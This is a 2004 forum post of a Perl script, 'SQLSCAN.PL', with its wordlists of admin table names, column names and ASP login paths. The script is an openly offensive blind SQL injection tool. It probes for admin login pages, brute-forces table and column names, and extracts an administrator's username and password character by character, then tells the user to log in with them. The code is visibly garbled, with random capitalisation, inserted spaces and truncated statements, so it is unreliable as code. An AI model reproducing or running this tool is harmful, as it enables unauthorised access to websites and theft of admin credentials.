SQLSCAN.PL
Submitted by Superhei On 2004, July 8, 2:17 Am. My DD
#! / usr / bin / perl
#Codz by black 嘿 black
#Thx Mix
$ | = 1;
Use IO :: Socket;
PRINT "=================================================================================================================================================== ======================== / n ";
Print "The SQLFORM-FIND SCRIPT CODZ by Black
Print "Our Team: www.cnse8.com / n";
Print "My Home: XYHACK.91I.NET / N";
PRINT "=================================================================================================================================================== ======================== / n ";
Print "Usage: SQL.EXE 127.0.0.1 80 /test/wenxue/readArticle.asp?id=3 test success / N";
Print "---------------------------------------------- ----------------------- / n ";
IF ($ # argv <1)
IF ($ # argv> 1) {
$ Host = $ argv [0];
$ port = $ argv [1];
$ WAY = $ argv [2];
$ Judge = $ Argv [3];
Open (DB, 'SQLFROM.TXT') || DIE "can't open splfrom.txt."
@Form =
Close (DB);
Open (l, 'lines.txt') || DIE "can't open lines.txt."
@lines =
Close (L);
Open (lg, 'login.txt') || DIE "can't open login.txt."
@Login =
CLOSE (LG);
Foreach $ log (@login) {
CHOMP $ LOG;
@ RES = STR1 ();
Foreach $ check (@res) {
($ HTTP, $ CODE, $ blah) = split (/ /, $ check);
IF ($ code == 200) {
Print "Kaka !! Find the login: http:// $ host $ way1 $ log / n";
}
}
}
Foreach $ sqlfrom (@form) {
CHOMP $ SQLFROM;
$ line = "*";
@ res = Str ();
@ Num = grep / $ judge /, @res;
$ SIZE = @ Num;
IF ($ SIZE> 0) {
Print "/ nkaka !! Find the SQLFROM IS / U / A / A $ SQLFROM / E: / N";
Foreach $ line1 (@lines) {
CHOMP $ LINE1;
$ line = $ line1;
@ res = Str ();
@ Num = grep / $ judge /, @res;
$ SIZE = @ Num;
IF ($ SIZE> 0) {
Print "/ a $ line1 / n";
}
}
}
}
Print "/ a / a / ninput the SQLFORM of Admin! / N $ SQLFORM ="; $ SQLFORM =
Print "$ ID ="; $ IDS =
Print "$ usrname ="; $ usrnames =
Print "$ Password ="; $ Passwords =
Print "/ n / nnow, start to crack! please wait ... / n / n";
#under here is sql words
$ PATH1 = "% 20D% 20Exists (SELECT% 20 $ IDS% 20FROM% 20 $ SQLFORM% 20where% 20 $ IDS =";
$ PATH2 = ")"
$ ID = CRACKINT ();
Print "/ n / nsuccessful, the id of the first admin's ID is / a $ ID ./N";
$ PATH1 = "% 20D% 20exists (SELECT% 20 $ IDS% 20FROM% 20 $ SQLFORM% 20where% 20LEN ($ Passwords) ="
$ PATH2 = "% 20And% 20 $ IDS = $ ID)";
$ len = crackint ();
Print "/ N / NSuccessful, The Len of Admin $ Password IS / A $ LEN ./N/N";
$ PATH1 = "% 20D% 20Exists (SELECT% 20 $ IDS% 20FROM% 20 $ SQLFORM% 20where% 20LEFT ($ Passwords,";
$ PATH2 = ") = '";
$ PATH3 = "'% 20and% 20 $ IDS = ID)"; @password = crackchar ();
Print "/ N / NSuccessful, The Admin's Password IS / A / A @ Password ./n";
$ PATH1 = "% 20D% 20exists (SELECT% 20 $ IDS% 20FROM% 20 $ SQLFORM% 20where% 20LEN ($ usernames) ="
$ PATH2 = "% 20And% 20 $ IDS = $ ID)";
$ len = crackint ();
Print "/ N / NSuccessful, The Len of Admin's Name is $ LEN ./n/n";
$ PATH1 = "% 20D% 20Exists (SELECT% 20 $ IDS% 20FROM% 20 $ SQLFORM% 20where% 20LEFT ($ usrnames,";
$ PATH2 = ") = '";
$ PATH3 = "'% 20And% 20 $ IDS = ID)";
@Username = crackchar ();
Print "/ n / nsuccessful, the admin's username is / a / a @ username ./n/n";
Print "Kaka !! / A / A / You can use / NUSERNAME: @ username / npassword: @ password / nto login test! / r / n";
Sub crackint {
@ DIC = (1..100);
For ($ I = 0; $ i <@dic; $ i )
{
MY $ PATH = $ PATH1. $ DIC [$ I];
MY $ PATH = $ PATH. $ PATH2;
$ REQ = "Get $ WAY $ PATH HTTP / 1.0 / R / N".
"REFERER: http:// $ host $ way / r / n".
"Host: $ Host / N / N";
Print "$ DIC [$ I]."
Sleep (1);
@IN = SOCK ($ REQ);
@n = grep / $ judge /, @IN;
$ SIZE = @ Num;
IF ($ SIZE> 0) {
RETURN $ DIC [$ I];
Last;
}
}
}
Sub crackchar {
MY $ PWS;
My @ DIC11 = (0..9);
my @ DIC12 = (a..z);
My @ DIC13 = (a..z);
MY @ special = QW (`~! @ # $% 25 ^% 26 * / (/) _% 2b = - {} []:"; <> |,. / /);
My @ special2 = qw (`~! · # ¥% ... - * () - - = {} []:"; '"│,. /, <>');
My @dic = (@ DIC11, @ DIC12, @ DIC13, @ Special, @ special2); for ($ j = 1; $ j <= $ g; $ j )
{
For ($ I = 0; $ i <@dic; $ i )
{
MY $ key = $ PWS. $ DIC [$ I];
MY $ PATH = $ PATH1. $ J;
MY $ PATH = $ PATH. $ PATH2;
MY $ PATH = $ PATH. $ key;
MY $ PATH = $ PATH. $ PATH3;
$ REQ = "Get $ WAY $ PATH HTTP / 1.0 / R / N".
"REFERER: http:// $ host $ way / r / n".
"Host: $ Host / N / N";
Print "$ DIC [$ I]."
Sleep (1);
@IN = SOCK ($ REQ);
@n = grep / $ judge /, @IN;
$ SIZE = @ Num;
IF ($ SIZE> 0) {
$ TH = $ j.th;
Print "/ NSuccessful, The $ th Word of The Char IS $ DIC [$ I] / N";
$ PWS = $ PWS. $ DIC [$ I];
Last;
}
}
}
$ PWS = ~ s //% 2b // / ig;
$ PWS = ~ S / /% 25 //% / IG;
$ PWS = ~ s //% 26 // & / ig;
Return $ PWS;
}
SUB STR {
$ PATH = "% 20And% 20exists (SELECT% 20". $ line. "% 20FROM% 20 $ SQLFROM)";
$ REQ = "get $ WAY $ PATH HTTP / 1.0 / N".
"Host: $ Host / N".
"Referr: $ Host / N".
"Cookie: / n / n";
SOCK ($ REQ);
}
SUB str1 {
@ s = split (, $ WAY);
$ S = @ s;
$ s = @ s [$ I-1];
$ D = Length ($ SS);
$ E = Length ($ WAY);
$ WAY1 = Substr ($ WAY, 0, $ E- $ D);
$ REQ = "GET $ WAY1 $ log http / 1.0 / n".
"Host: $ Host / N".
"Referr: $ Host / N".
"Cookie: / n / n";
SOCK ($ REQ);
}
Sub Sock {
MY ($ REQ) = @_;
MY $ Connection = IO :: Socket :: inet-> new (proto => "tcp",
Peeraddr => $ Host,
Peerport => $ port) || DIE "Sorry! Could Not connect to $ host / n";
Print $ Connection $ Req;
My @res = <$ connection>;
CLOSE $ Connection;
Return @res;
}
Sub usage {
Print "/ Ninput The Host Info! / N $ Host ="; $ host =
Print "$ WAY ="; $ WAY =
Print "/ Input the Judge Words! / N $ JUDGE ="; $ JUDGE =
}
=================== =============================================================================================================================
SQLFROM.TXT:
admin
User
Users
Userinfo
Admin_UserInfo
Password
Adminuser
Manboard
Diaryuseruser
PWD
T_User
user
administrator
Lines.txt:
id
UserID
Username
USR
admin
Name
User
Userpwd
Password
PWD
Passwd
PSWORD
PASS
PWS
PWA
User_id
User_name
User_pass
admin_id
admin_name
Admin_pass
Admin_password
U_ID
U_NAME
U_password
AUID
APWD
Name
password
Login.txt:
Pass.asp
PASSWORD.ASP
Psd.asp
UserName / login.asp
Username / admin.asp
Denglu.asp
Login / admin.asp
Login / login.asp
admin_login.asp
Login_Admin.asp
UserLogin.asp
User.asp
User / login.asp
Admin / admin.asp
Admin / login.asp
admin.asp
Login.htm
admin_login / admin.asp
Login_ADMIN / LOGIN_ADMIN.ASP
Login.asp
AdmPast.asp
admin_login.asp
adminLogin.asp
Managenews / index.htm
Admin / admin_login.asp
Admin_index.asp
Adminn / Index.asp
Admin / AdminLogin.asp
Admin / Default.asp
Manage / login.asp